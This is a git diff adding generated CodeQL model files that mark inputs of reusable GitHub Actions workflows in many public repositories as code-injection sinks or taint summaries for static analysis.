@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.dry-run", "code-injection", "generated"] + - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml new file mode 100644 index 000000000000..d96c0c99d0c1 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image-tag", "taint", "manual"] + - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml new file mode 100644 index 000000000000..f07f5ba54ea7 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["hashicorp/boundary/.github/workflows/test-cli-ui_oss.yml", "*", "input.artifact-name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml new file mode 100644 index 000000000000..391108291479 --- /dev/null 
+++ b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.package-names-command", "code-injection", "generated"] + - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.go-test-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml new file mode 100644 index 000000000000..196c25e14e95 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml 
@@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["hashicorp/terraform-cdk/.github/workflows/unit.yml", "*", "input.package", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.gitUser", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.gitEmail", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.providerFqn", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.parallelConversionsPerDocument", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.parallelFileConversions", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.languages", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.cdktfRegistryDocsVersion", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.files", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.maxRunners", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml new file mode 100644 index 000000000000..7a2e2fea0eb9 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["hashicorp/terraform-provider-tfe/.github/workflows/jira-issue-sync.yml", "*", "input.issue-extra-fields", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml new file mode 100644 index 000000000000..d00a80de5d1e --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.product-version", "code-injection", "generated"] + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.package-name", "code-injection", "generated"] + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.goarch", "code-injection", "generated"] + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.goos", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml new file mode 100644 index 000000000000..4f7926a22a68 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml 
@@ -0,0 +1,22 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-max", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-name", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.vault-edition", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.vault-version", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.name", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.path", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "input.name", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "input.go-arch", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "input.binary-tests", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "input.total-runners", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "input.storage_backend", "code-injection", "generated"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-version-package", "output.testable-packages", "taint", "manual"] + - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-revision", "output.testable-containers", "taint", "manual"] 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml new file mode 100644 index 000000000000..a0c0b5638dd0 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["heroku/cli/.github/workflows/publish-npm.yml", "*", "input.isStableRelease", "code-injection", "generated"] + - ["heroku/cli/.github/workflows/promote.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml new file mode 100644 index 000000000000..494c63d62720 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.project_name", "code-injection", "generated"] + - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.dependency_track_url", "code-injection", "generated"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.stage", "output.release_stage", "taint", "manual"] + - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.repository", "output.repo_url", "taint", "manual"] + - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.repository", "output.repo_name", "taint", "manual"] + - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.repository", "output.project", "taint", "manual"] 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml new file mode 100644 index 000000000000..bd855d53f139 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["home-assistant/operating-system/.github/workflows/test.yaml", "*", "input.version", "code-injection", "generated"] + - ["home-assistant/operating-system/.github/workflows/artifacts-index.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml new file mode 100644 index 000000000000..f499896a72ff --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.windowsBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.bazelBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.iosBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.macosBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.androidBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.linuxBuildArgs", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml new file mode 100644 index 000000000000..66bd5e8b99d7 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.package_name", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.repo_owner", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.hub_base_path", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.pr_number", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.commit_sha", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.languages", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.version_tag_suffix", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.additional_args", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.repo_owner", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml new file mode 100644 index 000000000000..fc0d7a48ca31 --- /dev/null 
+++ b/actions/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.folder_slices", "code-injection", "generated"] + - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.setup_status", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml new file mode 100644 index 000000000000..e3a048ee25cd --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.pull_request_number", "code-injection", "generated"] + - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.qt_version", "code-injection", "generated"] + - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.event_name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml new file mode 100644 index 000000000000..db3fb546f0f6 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ibm/sarama/.github/workflows/fvt.yml", "*", "input.kafka-version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml new file mode 100644 index 000000000000..3a1b8c8403ec --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["icloud-photos-downloader/icloud_photos_downloader/.github/workflows/build-package.yml", "*", "input.icloudpd_version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml new file mode 100644 index 000000000000..9f633ceca2a3 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["immich-app/immich/.github/workflows/build-mobile.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml new file mode 100644 index 000000000000..96eb05c06992 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["inria/spoon/.github/workflows/jreleaser.yml", "*", "input.release-script-to-run", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml new file mode 100644 index 000000000000..9448aaeabe1b --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["intel/intel-device-plugins-for-kubernetes/.github/workflows/lib-publish.yaml", "*", "input.image_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml new file mode 100644 index 000000000000..d9af00581aa1 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["inverse-inc/packetfence/.github/workflows/reusable_upload_packages.yml", "*", "input._PACKAGE_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml new file mode 100644 index 000000000000..aee71d38351f --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ispc/ispc/.github/workflows/reusable.rebuild.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml new file mode 100644 index 000000000000..cb06e03a0b20 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["jetbrains/intellij-platform-gradle-plugin/.github/workflows/reusable-single-unitTest.yml", "*", "input.gradleVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml new file mode 100644 index 000000000000..837ac52856bb --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml 
@@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.image", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.platform", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-merge-tags.yml", "*", "input.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-merge-tags.yml", "*", "input.image", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "input.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "input.image", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml new file mode 100644 index 000000000000..737350d2379e --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml 
@@ -0,0 +1,23 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kairos-io/kairos/.github/workflows/reusable-zfs-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "input.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "input.family", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "input.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-reset-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.base_image", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.family", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.model", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.variant", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-bundles-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-acceptance-test.yaml", "*", 
"input.port", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-acceptance-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-provider-upgrade-latest-test.yaml", "*", "input.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-provider-upgrade-latest-test.yaml", "*", "input.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml new file mode 100644 index 000000000000..3fd4d6157783 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kanidm/kanidm/.github/workflows/kanidm_individual_book.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml new file mode 100644 index 000000000000..caf13251f20f --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml 
@@ -0,0 +1,20 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kata-containers/kata-containers/.github/workflows/release-s390x.yaml", "*", "input.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/release-ppc64le.yaml", "*", "input.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/release-arm64.yaml", "*", "input.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/release-amd64.yaml", "*", "input.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "input.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "input.repo", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "input.registry", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "input.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "input.repo", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "input.registry", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "input.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "input.repo", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "input.registry", "code-injection", "generated"] + - 
["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-amd64.yaml", "*", "input.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-amd64.yaml", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml new file mode 100644 index 000000000000..2f8790197e1a --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml 
@@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.build_mode", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.release_branch", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.images_tag", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.quay_org", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend-tempo.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend-multicluster-primary-remote.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend-multicluster-multi-primary.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-backend.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-backend-multicluster-external-controlplane.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/build-frontend.yml", "*", "input.target_branch", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml new file mode 100644 index 000000000000..f51482fc02e4 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kotest/kotest/.github/workflows/run-gradle.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml new file mode 100644 index 000000000000..67b335536ac9 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-k8s-e2e.yaml", "*", "input.k8s-version", "code-injection", "generated"] + - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-images.yaml", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml new file mode 100644 index 000000000000..514fbac1d52f --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_tag", "code-injection", "generated"] + - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_name", "code-injection", "generated"] + - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.client", "code-injection", "generated"] + - ["kubescape/kubescape/.github/workflows/a-pr-scanner.yaml", "*", "input.UNIT_TESTS_PATH", "code-injection", "generated"] \ No newline at end of file 
